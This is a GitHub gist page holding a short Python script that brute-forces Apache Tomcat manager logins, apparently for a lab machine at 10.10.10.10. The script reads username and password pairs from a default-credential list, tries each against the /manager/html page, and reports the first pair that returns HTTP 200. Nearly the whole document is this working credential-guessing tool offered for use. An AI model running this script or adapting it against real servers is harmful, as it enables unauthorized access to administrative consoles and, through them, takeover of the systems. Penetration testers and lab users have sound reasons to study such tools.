Skip to content

Instantly share code, notes, and snippets.

@egre55

egre55/tomcat_brute_force.py

Last active November 8, 2019 06:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save egre55/36e603796dc342da4dd74785b2cb3578 to your computer and use it in GitHub Desktop.
Save egre55/36e603796dc342da4dd74785b2cb3578 to your computer and use it in GitHub Desktop.
Download ZIP
tomcat_brute_force
Raw
tomcat_brute_force.py
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip('\n').split(":")
r = requests.get('http://10.10.10.10:8080/manager/html', auth=(c[0], c[1]))
sys.stdout.write("\033[K")
sys.stdout.write(line.strip('\n') + '\r')
sys.stdout.flush()
if r.status_code == 200:
print "Found valid credentials \"" + line.strip('\n') + "\""
raise sys.exit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment